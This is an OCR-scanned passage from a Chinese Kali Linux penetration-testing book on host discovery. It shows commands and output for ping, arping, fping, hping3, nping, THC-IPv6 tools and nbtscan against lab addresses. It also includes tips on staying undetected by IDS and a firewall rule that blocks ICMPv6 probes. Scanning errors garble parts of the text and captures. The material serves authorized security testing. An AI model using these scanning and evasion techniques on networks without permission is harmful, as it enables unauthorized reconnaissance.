入 侵 防 御 系 统 时 ， 我 们 同样 需要 使 渗透 测试 的 行动 不 被 发 现 。 如 果 客 
户 没 有 这 种 要 求 ， 就 没有 必要 进行 隐匿 的 测试 了 。 


5.2.1 ping 


在 检查 主机 是 否 在 线 的 工具 中 ，ping 可 能 是 最 著名 的 程序 了 。 该 
工具 向 目标 主机 发 送 ICMP 协 议 (Internet Control Message Protocol) 的 
echo request 数据 包 。 如 采 目 标 主机 在 线 且 人 允许 受理 ping 请 求 ， 那 么 目 
标 主机 将 回复 ICMP echo reply 数 据 包 。 

ICMP 协 议 的 echo request (i>) Fecho reply (回复 ) 消息 只 是 
ICMP 协 议 的 两 种 类 型 的 消息 。 如 需 了 解 ICMP 协 议 的 其 他 类 型 消息 ， 


NEN a 
TH Zz 


= 


https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol#Control_ 
messages ° 

Kali Linux 的 荣 单 里 没有 列 出 ping 程序 。 所 以 我 们 要 在 终端 中 输入 
ping 命令 并 配置 好 它 的 选项 。 

如 图 5.1 所 示 ， 我 们 可 以 在 ping 指 令 之 后 直接 指定 目标 地 址 。 


oot@kali:~# ping 192.168.56.102 

PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data. 

64 bytes from 192.168.56.102: icmp req-1 ttl-64 time=1.03 ms 
64 bytes from 192.168.56.102: icmp req-2 ttl-64 time-0.421 ms 
54 bytes from 192.168.56.102: icmp_req=3 ttL=64 time=0.428 ms 
64 bytes from 192.168.56.102: icmp req-4 ttL=64 time=0.503 ms 
64 bytes from 192.168.56.102: icmp req-5 ttl-64 time-0.510 ms 
64 bytes from 192.168.56.102: icmp req-6 ttL=64 time=0.741 ms 
B4 bytes from 192.168.56.102: icmp req-7 ttl=64 time=0.503 ms 
64 bytes from 192.168.56.102: icmp req-8 ttl-64 time-0.771 ms 
54 bytes from 192.168.56.102: icmp req-9 ttl-64 time-0.477 ms 
64 bytes from 192.168.56.102: icmp req-10 ttL=64 time=0.522 ms 


--- 192.168.56.102 ping statistics --- 
10 packets transmitted, 10 received, 0% packet loss, time 9000ms 
rtt min/avg/max/mdev - 0.421/0.590/1.033/0.188 ms 


图 5.1 
在 Kali Linux 里 ， 默 认 情 况 下 在 按 下 Ctrl-C 之 前 ，ping 指令 会 一 直 
BENT. 
ping 有 很 多 的 选项 ， 最 常用 的 是 有 下 面 这 些 。 
e -c count: 发 送 echo request 数据 包 的 总 量 。 


e -I interface address: 设置 源 地 址 或 网 络 接口 。 该 参数 可 以 是 IP 
地 址 (例如 192.168.56.102) 或 网 卡 设备 的 名 称 (例如 eth0) 。 如 果 您 
要 ping IPv6 链 路 本 地 地 址 ， 那 么 必须 指定 这 个 选项 。 

e -s packet size: 每 个 数据 包 的 包 大 小 〈 字 节 数 ) 。 默 认 值 是 56。 
再 算 上 IPv4 中 8 字 节 的 ICMP 包 头 ， 默 认 情 况 下 发 送 的 数据 包 会 是 64 字 
节 的 数据 包 。 

假如 您 在 进行 内 部 渗透 测试 项 目 ， 客 户 会 给 您 拉 好 网 线 以 便于 您 
访问 他 们 的 内 网 。 他们 还 会 给 您 目标 服务 器 的 IP 地 址 。 

在 全 面 测试 之 前 ， 第 一 件 事 情 就 是 要 确定 您 是 否 可 以 从 本 机 访问 
到 目标 服务 器 。 此 时 可 以 使 用 ping 指 令 。 

假如 目标 主机 的 人 P 地 址 是 192.168.56.102， 您 的 电脑 的 人 P 地 址 是 
192.168.56.101。 在 测试 是 否 可 以 访问 到 目标 主机 时 ， 可 使 用 下 述 指 
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ping -c 1 192.168.56.102 
ping 指 令 的 目标 主机 参数 ， 可 以 是 IP 地 址 ， 也 可 以 是 主机 和 名。 
上 述 指 令 的 返回 结果 如 图 5.2 所 示 。 


root@kali:~# ping -c 1 192.168.56.102 
Ss 192.168.56.102 (192.168.56.102) 56(84) bytes of data. 
4 bytes from 192.168.56.102: icmp req-1 ttl=64 time-1.32 ms 


- 192.168.56.102 ping statistics --- 
1 packets transmitted, 1 received, 0% packet loss, time Oms 
rtt min/avg/max/mdev = 1.326/1.326/1.326/0.000 ms 


图 5.2 
EWEEK: ping 指 令 只 向 目标 主机 《〈 卫 地 址 为 


192.168.56.102) 发 送 了 1 个 ICMP echo request; 发 送 请 求 的 主机 (IP 地 
址 为 192.168.56.101) 也 只 收 到 了 1 个 ICMP echo reply; 请 求 和 回复 之 
间 的 往返 时 间 是 1.326ms; 期 间 没 有 丢失 数据 包 。 


我 们 观察 一 下 本 机 发 送 和 接受 的 数据 。 我 们 使 用 带 有 网 络 协议 分 


析 功 能 的 Wireshark 程 序 在 主机 上 捕获 数据 包 ， 可 看 到 如 图 5.3 所 示 的 情 
ES 
No. Time Source Destination Protocol Length Info 
98 Echo (ping) request idz0x0c78, seq-1/256, ttl=64 
98 Echo d-0x0c78, seq-1/256, ttl=6 


ping) reply 1 


图 5.3 
从 中 可 以 看 出 ， 我 们 自己 的 主机 (192.168.56.101) 向 目标 主机 
(192.168.56.102) 发 送 了 一 个 ICMP echo request 数 据 包 。 因 为 目标 主 

机 在 线 且 允许 受理 ICMP echo request 数 据 包 ， 它 同 我 们 的 主机 发 送 回 
ICMP echo reply 数 据 包 。 

10.4 广 将 详细 介绍 Wireshark 程 序 。 

如 果 目 标 主机 使 用 的 是 IPv6 地 址 ， 例 如 fe80::a00:27ff:fe43:1518， 
您 可 以 使 用 ping6 程 序 检 测 它 是 否 在 线 。 您 需要 指定 -I 选项 ， 设 定 发 送 
数据 包 的 本 地 连接 。 

# ping6 -c 1 fe80::a00:27ff:fe43:1518 -I ethO 

PING fe80::a00:27ff:fe43:1518(fe80::a00:27ff:fe43:1518) from 

fe80::a00:27ff:fe1c:5122 eth0: 56 data bytes 

64 bytes from fe80::a00:27ff:fe43:1518: icmp_seq=1 ttl=64 time-4.63 


--- fe80::a00:27ff:fe43:1518 ping statistics -- 

1 packets transmitted, 1 received, 0% packet loss, time Oms 
rtt min/avg/max/mdev = 4.633/4.633/4.633/0.000 ms 
ping6 指 令 的 通信 过 程 如 图 5.4 所 示 。 


No. Time Source Protocol Length info 
aO S VeRO THO Ir torrt far ome We mleor WILL Cation Ver Teer! HO 2 TIT I (ree 059700727115751727 
20.001892000 fee0::e00: 2711: feed: 1510 0:1000:27f f i1fe1c:5122 LOWS CJ hi tisement f080:1000:2711:1043:1518 ovr) is at 08:00:27: 


从 上 面 输出 可 以 看 出 ，ping6 程序 使 用 的 是 ICMPv6 协议 的 
ICMPrequest 和 reply 数 据 包 。 

如 需 屏 蔽 ping 请 求 的 数据 包 ， 可 在 防火 墙 里 配置 ICMP echo request 
的 日 名 单 ， 并 屏蔽 来 日 其 他 IP Suh ICM echo request 数据 包 。 


5.2.2 arping 


arping 是 在 局 域 网 中 使 用 ARP (Address Resolution Protocol) 请 求 
判断 目标 主机 是 否 在 线 的 工具 。 您 可 以 用 IP 地 址 或 MAC 地 址 作为 它 的 
测试 目标 。 

因为 arping 程 序 工 作 于 OSI 模 型 中 的 第 二 层 ，ARP 协 议 的 数据 包 无 

通过 路 由 器 和 了 网关 ， 所 以 它 只 能 检测 本 地 局 域 网 络 中 的 主机 。 

如 需 启 动 arping 程 序 ， 可 在 终端 中 使 用 下 述 命 令 。 

#arping 

该 指令 显示 所 有 的 选项 及 使 用 方法 。 

我 们 使 用 arping 程 序 判 断 某 MAC 地 址 的 主机 是 否 在 线 。 

# arping 192.168.56.102 -c 1 

ARPING 192.168.56.102 

60 bytes from  08:00:27:43:15:18  (192.168.56.102): index=0 
time-518.223usec 

--- 192.168.56.102 statistics -- 

1 packets transmitted, 1 packets received, 096 unanswered (0 extra) 

上 述 指令 检测 MAC 地 址 为 08:00:27:43:15:18 的 主机 是 否 在 线 。 

我 们 使 用 Wireshark 观 察 arping 运 行 期 间 的 网 络 数据 〈 见 图 5.5) ° 


No， Time Source Destination Protocol Length Info 
77771 0.000000000 08:00:27:1c0:51:22  ff:ff:ff:ff:ff:ff ARP ^——— 42 Who has 192.168.55.102? Tell 192.168.56.101 
2 0.001643000  08:00:27:43:15:18  08:00:27:1c:51:22 ARP 60 192.168.56.102 1s at 08:00:27:43:15:18 


图 5.5 
可 从 图 5.5 中 看 出 ， 本 机 的 网 卡 (MAC 地 址 为 08:00:27:1c:51:22 ) 
发 送 了 ARP 广 播 (接受 方 MAC 地 址 为 ff:ff:ff:ff:ff:ff) ， 询 问 


192.168.56.102 的 MAC 地 址 。 如 果 这 个 了 地 址 存在 ， 该 主机 将 其 MAC 地 
Hk (08:00:27:43:15:18) 通过 ARP 协 议 进 行 回 复 ; 即 返回 图 5.5 中 第 2 个 
数据 包 。 

如 果 没 有 任何 一 台 主 机 占用 指定 的 IP 地 址 ， 我 们 也 不 会 受到 ARP 协 
议 的 回复 数据 ， 如 图 5.6 所 示 。 


Protocol | Length Info 


42 Who has 192.168.586.103? Tell 192. 168.56.101 
42 Who has 192.168.56.103? Tell 192.168.56.101 


图 5.6 

基于 以 上 特性 ，arping 程 序 还 常常 用 于 判断 某 个 IP 地 址 是 否 被 同一 
个 局 域 网 内 的 主机 占用 。 假 如 您 的 主机 通常 使 用 192.168.56.101 这 个 IP 
地 址 ， 某 天 您 想 要 换 一 个 IP 地 址 。 那 么 ， 在 更 换 IP 地 址 之 前 ， 应 当 检 查 
该 了 地 址 是 否 补 其 他 主机 占用 了 。 

此 时 可 以 使 用 下 述 arping 指 令 检 测 192.168.56.102 是 否 被 他 人 占用 。 

# arping -d -i eth0 192.168.56.102 -c 2 

# echo $? 

1 

如 果 返 回 值 是 1， 则 说 明 192.168.56.102 这 个 IP 已 经 被 占用 了 。 如 果 
返回 值 是 0， 则 说 明 该 IP 没 有 被 占用 。 


5.2.3 fping 


与 ping 程序 相 比 ，fping 可 以 同时 间 多 个 主机 发 送 ping (ICMP 
echo) 请 求 。 您 可 以 在 命令 行 中 指定 多 个 目标 主机 ， 也 可 以 在 某 个 文 
件 里 指定 需要 被 检测 的 主机 。 

默认 模式 下 ，fping 程序 通过 目标 主机 的 回复 来 判断 该 主机 是 否 在 
线 。 如 果 目 标 主机 发 送 了 回应 ， 该 主机 将 会 被 标记 为 alive (在 线 ) : 
如 果 主 机 在 一 段 时 间 内 〈 超 时 或 超过 党 试 次 数 ) 没有 进行 响应 ， 该 主 
机 则 会 被 标记 为 unreachable (不 可 访问 ) 。 默 认 情况 下 ， fping 将 尝试 
向 每 个 目标 发 送 三 次 ICMP echo 数据 包 。 


如 需 使 用 fping 程 序 ， 可 在 终端 中 执行 下 述 指 令 。 

#fping -h 

上 述 指令 将 显示 程序 的 所 有 选项 及 使 用 方法 。 

下 面 将 介绍 fping 程 序 的 几 种 不 同 用 法 。 

e 如 果 需 要 同时 检测 地 址 为 192.168.1.1 ^ 192.168.1.100 和 
192.168.1.107 的 主机 是 否 在 线 ， 我 们 可 以 使 用 下 述 指令 。 

#fping 192.168.1.1 192.168.1.100 192.168.1.107 

上 述 指 令 的 返回 结 末 如 下 。 

192.168.1.1 is alive 

192.168.1.107 is alive 

ICMP Host Unreachable from 192.168.1.112 for ICMP Echo sent to 

192.168.1.100 

ICMP Host Unreachable from 192.168.1.112 for ICMP Echo sent to 

192.168.1.100 

ICMP Host Unreachable from 192.168.1.112 for ICMP Echo sent to 

192.168.1.100 

192.168.1.100 is unreachable 

e 如 末 不 想 逐 IP 地 指定 目标 主机 ， 我 们 可 以 指定 目标 主机 的 列 
表 。 假 设 我 们 知道 192.168.56.0 这 个 网 段 里 有 需要 检测 的 目标 主机 ， 就 
可 以 直接 使 用 -g 选 项 〈 生 成 列表 ) 对 整个 网 段 进 行 检测 。 

# fping -g 192.168.56.0/24 

上 述 指 令 的 返回 结 采 如 下 。 

192.168.56.101 is alive 

192.168.56.102 is alive 

ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.2 


ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.3 

ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.4 

ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.5 

ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.6 


192.168.56.252 is unreachable 

192.168.56.253 is unreachable 

192.168.56.254 is unreachable 

e 如 需 改 变 探测 目标 主机 的 重 试 次 数 ， 则 可 在 指令 之 中 使 用 - 选项 
(retry limit) 。 默 认 情 况 下 ， 重 试 次 数 是 3 次 。 

#fping -r 1 -g 192.168.1.1 192.168.1.10 

上 述 指令 的 返回 结 采 如 下 。 

192.168.1.1 is alive 

192.168.1.10 is alive 

192.168.1.2 is unreachable 


192.168.1.9 is unreachable 

。 如 需 查看 多 个 目标 的 统计 结果 ， 可 以 使 用 -s 选项 (打印 累积 统 
计 ) 。 

#fping -s www.yahoo.com www.google.com www.msn.com 

上 述 指令 的 返回 结 采 如 下 。 

www.google.com is alive 


www.yahoo.com is alive 


www.msn.com is unreachable 
3 targets 
2 alive 
1 unreachable 
0 unknown addresses 
4 timeouts (waiting for response) 
6 ICMP Echos sent 
2 ICMP Echo Replies received 
0 other ICMP received 
51.6 ms (min round trip time) 
231 ms (avg round trip time) 
411 ms (max round trip time) 


4.150 sec (elapsed real time) 
5.2.4 hping3 


hping3 程 序 是 命令 行 下 的 网 络 数据 包 生 成 和 分 析 工 具 。 在 TCP/IP 测 
试 和 安全 测试 里 ， 例 如 在 端口 扫描 、 防 火 墙 规则 测试 、 网 络 性 能 测试 
时 ， 都 可 以 使 用 这 个 程序 生成 自 定 义 的 网 络 数据 包 ， 从 而 进行 相应 测 
试 。 

hping3 的 研发 团队 在 官方 网 站 上 (http://wiki.hping.org/25) 说 明了 
EMER AR: 

e 测试 防火 墙 规 则 ，; 

e 测试 入 侵 检 测 系 统 /IDS; 

e 测试 TCP/IP 模式 的 安全 漏洞 。 

如 需 局 动 hping3 程 序 ， 可 在 终端 中 输入 hping3 指 令 。 

您 可 以 通过 命令 行 、 互 动 弄 面 、 脚 本 的 方式 执行 hping3。 


在 不 指定 任何 参数 的 情况 下 ， 直 接 运行 nping3 将 向 TCP 的 0 号 端口 
发 送 空 数据 。 
如 需 改变 通信 协议 ， 可 参照 下 述 表 格 更 改 相应 选项 。 


编号 选项 缩写 选项 全 称 描 R 
1 -0 --raw-ip 发 送 原始 全 包 
2 -1 --icmp 发 送 ICMP 包 
3 -2 --udp GE UDP 包 
4 -8 --scan 进入 扫描 模式 
5 -9 --listen 进入 监听 模式 


在 发 送 TCP 数 据 包 时 ， 我 们 可 以 不 设置 任何 TCP 标 识 (RU 
况 ) ， 还 可 以 参考 下 述 表 格 指定 特定 TCP 标 识 。 


编 号 z 项 标识 名称 
1 =S syn 
2 -A ack 
3 -R rst 
4 -F fin 
5 =P psh 
6 -U urg 
7 -X xmas: UH fin. urg, psh 
8 -Y ymas 


这 个 程序 有 下 面 几 种 不 同 的 使 用 方法 。 
e 如 果 要 问 192.168.56.101 发 送 1 个 ICMP echo 请 求 ， 就 要 设置 -1 选 
项 (使 用 ICMP 协 议 ) 和 -c 1 选项 (发 送 1 次 ) 。 
hping3 -1 192.168.56.101 -c 1 
上 述 指 令 的 返回 结果 如 图 5.7 所 示 。 
root@kali:~# hping3 -1 192.168.56.101 -c 1 


HPING 192.168.56.101 (ethO 192.168.56.101): icmp mode set, 28 headers + 0 data bytes 
len-46 ip=192.168.56.101 ttl=64 id-33099 icmp seq-0 rtt-9.0 ms 


- 192.168.56.101 hping statistic --- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 9.0/9.0/9.0 ms 


图 5.7 


在 图 5.7 中 ， 我 们 注意 到 目标 主机 在 线 ， 它 回复 了 ICMP echo 请 
求 o 

要 验证 这 一 结果 ， 我 们 可 用 tcpdump 程 序 捕获 网 络 数据 ， 结 果 如 图 
5.8 所 示 。 
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图 5.8 
可 见 目 标 主机 的 确 发 送 了 ICMP echo 回复 数据 包 。 
e 除了 命令 行 方式 之 外 ， 我 们 可 以 直接 输入 hping3， 进 入 它 的 互动 


和 界面。 您 将 会 看 到 提示 符 ， 可 在 此 使 用 Tel 指令。 
如 需 了 解 Tcl 的 详细 指令 ， 请 参见 : 
http://www.invece.org/tclwise/ 
http://wiki.tcl.tk/ 
要 实现 前 一 个 例子 的 功能 ， 我 们 可 以 使 用 下 述 Tcl 脚 本 。 
hping send {ip(daddr=192.168.56.101)+icmp(type=8,code=0)} 
新 建 一 个 终端 窗口 ， 然 后 使 用 下 壕 指令 接收 目标 服务 器 的 响应 。 


hpingrecv ethO 
在 此 之 后 ， 我 们 在 其 他 终端 窗口 里 使 用 上 述 Tcl 脚 本 ， 具 体 情 况 如 
图 5.9 所 示 。 


root@kali:~# hping3 

hping3» hping recv ethO 

ip(ihl=0x0,ver=0x0, tos=0x00, tot Len=0,id=0, fragoff=0,mf=0,df=0, rf=0,ttl=0,proto=0,cksum 
=0x0000 ,saddr=0.0.0.0,daddr=0.0.0.0) 


图 5.9 
e 您 还 可 以 使 用 hping3 检验 防火 墙 规则 。 假 设 您 的 防火 墙 规则 如 


o 接受 (ACCEPT) 所 有 到 TCP 22 端口 的 数据 ; 
o 接受 所 有 现存 (established) 连接 ; 
o EF (DROP) 其 他 数据 包 。 


验证 防火 墙 规则 时 ， 可 以 使 用 hping3 程序 发 送 ICMP echo 请 求 。 

hping3 -1 192.168.56.101 -c 1 

上 壕 指 令 的 返回 结果 如 下 。 

HPING 192.168.56.101 (eth0 192.168.56.101): icmp mode set, 28 

headers + 0 data bytes 

--- 192.168.56.101 hping statistic -- 

1 packets transmitted, 0 packets received, 10096 packet loss 

round-trip min/avg/max - 0.0/0.0/0.0 ms 

可 见 目标 主机 没有 对 我 们 的 ping 进 行 啊 应 。 

如 图 5.10 所 示 ， 我 们 向 目标 主机 的 TCP 22 端口 发 送 一 个 带 有 SYN 
标识 的 TCP 包 。 


root@kali:~# hping3 192.168.56.101 -c 1 -S -p 22 -s 6060 
HPING 192.168.56.101 (ethO 192.168.56.101): S set, 40 headers + © data bytes 
Len=46 ip=192.168.56.101 ttl=64 DF id-0 sport=22 flags=SA seq-0 win-5840 rtt-2.5 ms 


- 192.168.56.101 hping statistic --- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 2.5/2.5/2.5 ms 


图 5.10 
上 述 信息 表明 : 目标 主机 接受 了 刚才 我 们 发 送 到 22 端 口 的 带 SYN 
标识 的 TCP 包 。 
然后 ， 我 们 测试 它 的 UDP 22 端口 ( 见 图 5.11) e 


root@kali:~# hping3 -2 192.168.56.101 -c I -S -p 22 -s 6060 
HPING 192.168.56.101 (ethO 192.168.56.101): udp mode set, 28 headers + 9 data bytes 


- 192.168.56.101 hping statistic --- 
l packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max - 0.0/0.0/0.0 ms 


图 5.11 
根据 图 5.11， 我 们 可 确定 目标 主机 的 防火 墙 不 接受 到 22 珊 口 的 UDP 
数据 包 。hping3 的 功能 很 多 。 但 是 本 章 只 人 简单 介绍 了 hping3 的 一 小 部 
分 功能 。 如 果 您 需要 详细 了 解 这 个 程序 ， 请 参见 hping3 的 官方 文件 : 
http://wiki.hping.org ° 


5.2.5 nping 


nping 人 允许 用 户 发 送 多 种 协议 (TCP、UDP、ICMP 和 ARP 协 议 ) 的 
数据 包 。 您 可 以 调整 协议 头 中 的 字段 ， 例 如 可 设置 TCP 和 UDP 的 源 端 口 
和 目的 端口 。nping 和 其 他 类 似 工 具 的 区 别 ， 如 nping 程 序 和 ping 程 序 之 
则 的 区 别 相 似 ，nping 可 以 探测 多 个 主机 的 多 个 端口 。 

此 外 ， 它 可 以 像 ping 程序 一 样 发 送 ICMP echo 请 求 。nping 还 可 以 
用 于 对 网 络 进行 压力 测试 、ARP 中 毒 、DoS 攻 击 。 

在 Kali Linux 中 ，nping 程序 是 Nmap 程序 包 的 一 部 分 。 

nping 文 持 多 种 探测 模式 ， 其 对 应 的 具体 参数 如 下 。 


编号 模式 选项 说 明 
1 --tcp-connect 基础 的 tep-connect 功能 
2 --tcp TCP 模式 
3 --udp UDP 模式 
4 --icmp ICMP 模式 《默认 模式 ) 
5 --arp ARP/RARP 模式 
6 = traceroute 模式 〈 仅 与 TCP/UDP/ICMP 模式 兼容 ) 


在 编写 本 书 时 ， 还 不 能 通过 Kali Linux 的 图 形 化 菜单 启动 nping 程 
序 。 所 以 您 得 在 终端 中 执行 nping 命 令 才 能 启动 它 。 该 命令 将 显示 它 的 
使 用 方法 和 选项 介绍 © 

如 需 向 多 个 目标 主机 (192.168.56100 、192.168.56.101 和 
192.168.56.102) 发 送 ICMP echo 请 求 ， 可 使 用 下 述 指 令 。 

nping -c 1 192.168.56.100-102 

上 壕 指 令 的 返回 结果 如 图 5.12 所 示 。 


Starting Nping 0.6.25 ( http://nmap.org/nping ) at 2013-06-28 20:48 WIT 

SENT (0.0087s) ICMP 192.168.56.101 > 192.168.56.100 Echo request (type-8/code-0) ttl=64 id=32821 iplen=28 
SENT (1.0109s) ICMP 192.168.56.101 > 192.168.56.101 Echo request (type-8/code-0) ttl1-64 id=32821 iplen=28 
SENT (2.0134s) ICMP 192.168.56.101 > 192.168.56.102 Echo request (type-8/code-0) ttl1-64 id=32821 iplen-28 
RCVD (2.0153s) ICMP 192.168.56.102 > 192.168.56.101 Echo reply (type=G/code=0) tt1=64 id=62113 iplen-28 


Statistics for host 192.168.56.100: 

| Probes Sent: 1 | Revd: @ | Lost: 1 (100.00%) 

|. Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A 
Statistics for host 192.168.56.101: 

| Probes Sent: 1 | Revd: @ | Lost: 1 (100.00%) 

|_ Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A 
Statistics for host 192.168.56.102: 

| Probes Sent: 1 | Revd: 1 | Lost: © (0.009) 

|. Max rtt: 1.461ms | Min rtt: 1.461ms | Avg rtt: 1.461ms 
Raw packets sent: 3 (84B) | Revd: 1 (46B) | Lost: 2 (66.67%) 
Tx time: 2.00769s | Tx bytes/s: 41.84 | Tx pkts/s: 1.49 
Rx time: 2.00856s | Rx bytes/s: 22.90 | Rx pkts/s: 0.50 
Nping done: 3 IP addresses pinged in 2.02 seconds 


图 5.12 

我 们 可 以 根据 这 个 结果 判断 ， 只 有 192.168.56.102 响 应 了 我 们 的 请 
求 o 

在 目标 主机 不 响应 ICMP echo 请 求 数据 包 的 情况 下 ， 我 们 可 以 同 该 
主机 开放 的 TCP 端 口 发 送 TCP SYN 数据 包 检 验 它 是 否 在 线 ( 见 图 
5.13) » 

如 果 我 们 要 向 192.168.56.102 主机 的 22 端口 (-p 22) 发 送 1 次 (- 
c1) TCP (--tcp) 数据 包 ， 可 使 用 下 述 指令 

nping --tcp -c 1 -p 22 192.168.56.102 

当然 ， 您 得 自己 猜测 哪个 端口 是 开放 端口 。 我 们 建议 您 从 常规 端 
口 开始 测试 ， 即 21、222、23、25、80、443 和 8443 端 口 。 

上 述 指 令 的 运行 结果 如 图 5.14 所 示 。 


root@kali:~# nping -c 1 192.168.56.102 


Starting Nping 0.6.40 ( http://nmap.org/nping ) at 2013-11-08 12:36 WIT 
SENT (0.0036s) ICMP [192.168.56.101 > 192.168.56.102 Echo request (type=8/code=0 
) id=40235 seq-1] IP [ttL=64 id=59056 iplen-28 ] 


Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A 
Raw packets sent: 1 (28B) | Rcvd: © (0B) | Lost: 1 (100.009) 
Nping done: 1 IP address pinged in 1.01 seconds 


图 5.13 


root@kali:~# nping --tcp -c 1 -p 22 192.168.56.102 


Starting Nping 0.6.40 ( http://nmap.org/nping ) at 2013-11-08 12:38 WIT 

SENT (0.0030s) TCP 192.168.56.101:10561 > 192.168.56.102:22 S tt1-264 id-18944 ip 
len=40 seq=1823950621 win=1480 

RCVD (0.0043s) TCP 192.168.56.102:22 > 192.168.56.101:10561 SA ttL=64 id-0 iplen 
=44 seq=793586661 win=5840 <mss 1460> 


Max rtt: 1.122ms | Min rtt: 1.122ms | Avg rtt: 1.122ms 
Raw packets sent: 1 (40B) | Rcvd: 1 (46B) | Lost: 0 (0.00%) 
Nping done: 1 IP address pinged in 1.00 seconds 


图 5.14 
根据 这 个 结果 ， 可 知 该 主机 响应 了 我 们 发 送 到 22 端 口 的 数据 包 ， 
所 以 可 以 判断 目标 主机 (192.168.56.102) 在 线 。 


5.2.6 alive6 


如 果 您 需要 检测 IPv6 中 联 入 了 哪些 主机 ， 肯 定 不 应 该 扫描 整个 网 
络 。 因 为 IPv6 的 地 址 空间 太 大 了 。 您 可 能 已 经 发 现 ITPv6 主 机 的 网 段 是 64 
位 的 。 这 意味 着 如 果 进 行 网 段 扫 描 ， 扫 描 次 数 就 至 少 要 有 2 的 64 次 方 。 
很 明显 ， 在 现实 世界 中 进行 IPv6 的 网 段 扫 描 不 太 现 实 。 

幸运 的 是 ， 有 一 种 名 为 ICMPv6 Neighbor Discovery (邻居 发 现 ) 的 
网 络 协 议 。 该 协议 允许 IPv6 主 机 接 入 本 地 链 路 系统 ， 并 根据 局 域 网 内 
其 他 IPv6 主 机 的 地 址 自动 配置 自己 的 地 址 。 人 简单 的 说 ， 您 可 以 使 用 这 
个 协议 发 现 同 网 段 内 在 线 的 主机 。 

alive6 程序 可 以 发 送 ICMPv6 的 检测 数据 包 ， 并 能 处 理 网 络 上 的 响 
应 。 这 个 程序 是 THC-IPv6 Attack Toolkit 的 一 部 分 。 它 的 研发 人 员 是 
The Hackers Choice 小 组 ( http://freeworld.thc.org/thc-ipv6/ ) 的 Van 
Hauser ° 
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假设 您 想 要 在 IPv6 局 域 网 内 查找 在 线 的 IPv6 主 机 ， 在 您 使 用 eth0 接 
入 这 个 网 络 的 情况 下 ， 您 可 以 使 用 下 述 指令 。 

alive6 -p eth0 

该 指令 的 返回 结果 如 下 。 


Alive: fe80::a00:27ff:fe43:1518 [ICMP echo-reply] 

Scanned 1 address and found 1 system alive 

如 采 不 布 望 其 他 主机 通过 这 种 方式 探测 到 目 己 的 IPv6 主 机 ， 可 以 
通过 ip6tables 指 令 屏蔽 ICMPv6 的 echo 请 求 。 

ip6tables -A INPUT -p ipv6-icmp —-type icmpv6-type 128 -j DROP 

日 标 主 机 使 用 了 这 条 指令 之 后 ， 束 无 法 通过 这 种 方式 检测 到 它 了 

( 见 图 5.15) 。 

root@kali:~# alive6 -p ethO 


canned 1 address and found O systems alive 


图 5.15 
5.2.7 detect-new-ip6 


这 个 程序 可 以 在 IPv6 的 网 络 里 检测 到 新 加 入 网 络 的 主机 。 它 也 是 
THC 一 IPv6 Attack Toolkit 的 一 个 程序 。 

可 以 在 终端 中 直接 输入 detect-new-ipv6 来 启动 它 。 这 将 显示 它 的 使 
J 

此 处 举 个 简单 的 例子 : 我 们 要 发 现 加 入 网 络 的 IPv6 主 机 。 

detect-new-ip6 eth0 

上 壕 指 令 的 返回 结果 如 下 。 

Started ICMP6 DAD detection (Press Control-C to end) ... 

Detected new ip6 address: fe80::a00:27ff:fe43:1518 


5.2.8 passive discovery6 
如 果 需 要 通过 网 络 监听 的 方式 找到 主机 的 IPv6 地 址 ， 可 使 用 这 个 
程序 。 它 是 由 The Hackers Choice 小 组 (http://freeworld.thc.org/thc- 
ipv6/) 的 Van Hauser 开 发 的 THC-IPv6 Attack Tookit 里 的 一 个 程序 。 使 
用 这 个 程序 可 以 避免 被 IDS 检测 出 来 。 


可 以 在 终端 中 直接 输入 passive_discovery6 来 启动 它 ， 这 将 显示 它 的 
合用 方 从 入 

如 果 要 在 网 卡 eth0 上 进行 监听 ， 可 使 用 下 述 指令 。 

passive discovery6 ethO 

上 述 指 令 的 运行 结 末 如 图 5.16 所 示 。 
root@kali:~# passive discovery6 ethg 
Started IPv6 passive system detection (Press Control-C to end) ... 


Detected: fe80::31ad:1227:d1d3:a002 
Detected: fe80::a00:27ff:fe43:1518 


图 5.16 
这 个 程序 只 是 在 监听 过 程 中 筛选 ARP 请 求 和 ARP 回 复 ， 然 后 进行 
相应 的 分 析 。 在 刚才 的 例子 里 ，passive_discovery6 发 现 了 两 个 IPv6 地 
址 ， 这 两 个 地 址 如 下 所 示 。 
e fe80::31ad:1227:d1d3:a002 
e fe80::a00:27ff:fe43:1518 


5.2.9 nbtscan 


如 果 在 内 网 渗透 测试 中 审计 Windows 系 统 ， 您 需要 首先 获取 主机 的 
NetBIOS 信 息 。 最 常用 的 工具 束 古 nbtscan 。 

这 个 工具 可 以 将 相应 主机 IP 地 址 、NetBIOS 计 算 机 名 、 可 用 服务 、 
登录 用 户 名 和 MAC 地 址 整理 为 报告 。 如 需 采 用 NetBIOS 协 议 访 问 目标 
主机 的 NetBIOS 服 务 《例如 网 络 共享 ) ， 束 需要 掌握 目标 主机 的 
NetBIOS 名 称 。 这 个 工具 将 会 产生 大 量 的 网 络 流量 ， 而 且 很 可 能 被 目标 
主机 记录 在 日 志 里 。 

如 需 了 解 NetBIOS 报 告 中 每 个 服务 的 功能 ， 可 在 微软 知识 库 (URL 
地 址 为 http://support.microsoft.conykb/163409) 里 查询 NetBIOS 服 务 名 
称 的 第 16 个 字符 ( 即 NetBIOS 后 级 ) ° 

可 以 在 终端 中 直接 输入 nbtscan 来 局 动 它 。 


如 需 搜 索 局 域 网 (192.168.1.0/24) 内 各 个 主机 的 NetBIOS 名 称 ， 可 
TERI Pulte e 

nbtscan 192.168.1.1-254 

该 指令 的 返回 结果 如 下 。 

Doing NBT name scan for addresses from 192.168.1.1-254 

IP address NetBIOS Name Server User MAC address 


192.168.1.81  PC-001 <server> «unknown»? 
00:25:9c:9f:b0:96 
192.168.1.90 PC-003 <server> «unknown»? 
00:00:00:00:00:00 


